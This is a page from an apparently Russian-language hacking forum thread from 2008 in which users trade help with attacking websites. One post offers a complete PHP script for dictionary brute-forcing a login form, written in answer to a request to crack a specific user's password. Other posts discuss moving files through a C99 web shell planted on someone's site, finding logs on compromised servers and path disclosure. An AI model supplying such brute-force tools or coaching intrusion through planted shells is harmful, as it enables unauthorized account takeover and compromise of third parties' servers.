Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Есть отличные команды в никсах:
    find и locate - вот и ищи логи.
    А в Win серверах все еще проще,обычно они либо в logs,либо как писал ChaaK - на диру выше www.
     
    #3541 $n@ke, 8 Nov 2008
    Last edited: 8 Nov 2008
    2 people like this.
  2. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Незнал где спросить, запостил сюда.

    Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
     
  3. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    2samarin

    wwwhack прога старая но принципы досихпор не поменялись так что юзай если капчи нет или ограничения на количество попыток

    если не найдешь могу скинуть на почту
     
    1 person likes this.
  4. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    wwwhack с https не работает. Есть ли еще какие нибудь варианты?
     
  5. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109


    PHP:
    <?################Брутфорс  Форм##################
    ///////////////////////----(c) nc.STRIEM----//////////////////////////
        
    $filepas="file.txt" ///файл   с данными для брута
        
    $filegood="good.txt"///файл с подходящими паролями
        
    $endifg=1///закончить при первом же найденом 1-да 0-нет
        
        
    $iskl=array();
    //////строки которых не  должно быть в правельных страницах/////////
         
    $iskl[0]="Неверный пароль";
        
    //$iskl[1]="Неверная длина пароля!";
        //$iskl[2]="ERROR";
        //$iskl[3]="Ошибка";
        
    //////////////////////////////////////////////////////////////////
        
    $host="localhost";  ///хост
        
    $script="/form.php";     ///скрипт 
                                        
    ///////////////////////////////////////////////Передоваемый Header ///////////////////////////////////////////////////////    
        
    $header="POST http://$host$script HTTP/1.0\r\n";
        
    $header.= "Host: $host\r\n";
        
    $header.= "Content-Type: application/x-www-form-urlencoded\r\n";
    //////Не обязательные параметры! но не всегда///
        //$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n";
        //$header.="Accept-Language: ru\r\n";
        //$header.= "Proxy-Connection: Keep-Alive\r\n";
        //$header.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425))\r\n";
        //$header.="Referer:  http://microsoft.com\r\n";
        //$header.="Cookie: CREATED=nc.STRIEM\r\n";
    ####################################Сам брут#####################################    
        
    set_time_limit(0);
        
    $fo=fopen($filepas,"r");
        
    $kolvoporolei=0;
        
    $timestart=time('U');
        
    $fgo=fopen($filegood,"a");
        echo 
    "<h3><center>Мы брутили http://$host$script</center></h3>";
     while(!
    feof($fo))
     {
    /////////////////////////////////////////////
    $fp fsockopen("www.".$host80$errno$errstr30);
    if (!
    $fp
        echo 
    "$errstr ($errno)<br />\n";
     else 
     {
      
    $kolvoporolei++;
       
    $dan=rtrim(fgets($fo));  /////берем данные из файла
        
    $dannii=split(';',$dan);
        
        
    $out=$header;
        
    $zapr="login=$dannii[0]&password=$dannii[1]";     ////имена переменных и их значения сюда
        
    $contleng=strlen($zapr);
        
    $out.= "Content-Length: $contleng\r\n";
        
    $out.= "Pragma: no-cache\r\n\r\n";
        
    $out.= "$zapr\r\n\r\n";

         
    fwrite($fp$out);
        
    $conte="";
     while (!
    feof($fp)) 
       
    $conte.=fgets($fp);
       
      
    $est=1;
    for(
    $i=0;$i<sizeof($iskl);$i++)
       if(
    strstr($conte$iskl[$i]))
         {
         
    $est=0;
         break;
         }
    /////может понадобиться при настройки///
    //echo htmlspecialchars($conte); break;
    /////////////////////////////////
    if($est)
       {
       
    fwrite($fgo,$dannii[0].";".$dannii[1]."\n");
       echo 
    "<h3><tt>Найдено:".$dannii[0].";".$dannii[1]."</tt></h3>";
       if(
    $endifg)
          break;
        }
         
    fclose($fp);
      }
    }
    //////////////////////////////////////////////////////////////////////////////////////////
    fclose($fgo);
    $time=time('U')-$timestart;
    echo 
    "<h1><center>Закончено</center></h1><br><h3><tt>Проверенно $kolvoporolei вариантов, за $time секунд!</tt></h3><br><h4 align=center><center><tt>©*nc.STRIEM<br>[email protected]</tt></center></h4>";
    ?> 
     
    1 person likes this.
  6. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    как раскрыть пути в Zeus Web Server? ))
     
  7. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Всем здрасти....
    Собственно сабж! Залил шелл(на сайт) и доступна тока командная строка виндувс, надо залить или стянуть какой либо файл! Когда пишу "ftp" в cmd то там просто пустая строка (не туда и не туда) вообщем я думаю не пашет команда(или я хз что).... Нужно стянуть файл (или залить) как это можно сделать (Ftp-глюки)
     
  8. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Только под своим ипом обязательно!!!!)
    Какой шелл?
     
  9. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    С99 madnet edition

    штоле
     
  10. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    diznt
    А ты уверен что под маздаем сидишь? Может ты под FreeBSD, и пытаешься выполнить виндовые команды ))
     
  11. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Я уверен!
     
  12. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Ну если команды не работают а файл надо залить, то заливай так же, как залил шелл.
     
  13. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Нет! Мне нужно именно через CMD
    CMD работает (то есть просмотр директорий доступен и т.п.)
    А так же интересует как скачать файл
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    в своем виндоуз:

    пуск-выполнить-cmd-help
     
  15. Zinus

    Zinus Banned

    Joined:
    8 Aug 2008
    Messages:
    17
    Likes Received:
    10
    Reputations:
    1
    Просто через cmd никак ты не зальешь
     
  16. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Zinus вот когда я пишу в CMD "ftp"
    То "FTP>" не высвечиваеться тама! вот в чем проблема
     
  17. Zinus

    Zinus Banned

    Joined:
    8 Aug 2008
    Messages:
    17
    Likes Received:
    10
    Reputations:
    1
    Значит скорее всего в папке windows/system32/ нет ftp.exe. Не судьба
     
  18. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Zinus а с провами тоже не как??? Или можно в окошечко CMD вывести то что в файле .php написано???
     
    #3558 diznt, 9 Nov 2008
    Last edited: 9 Nov 2008
  19. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in.........
    есть сайт. На нем нашел такую страничку. Что ето и как его использовать???
     
  20. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    это ошибка, кроме раскрытия путей нечего не даст...
     
    1 person likes this.
Thread Status:
Not open for further replies.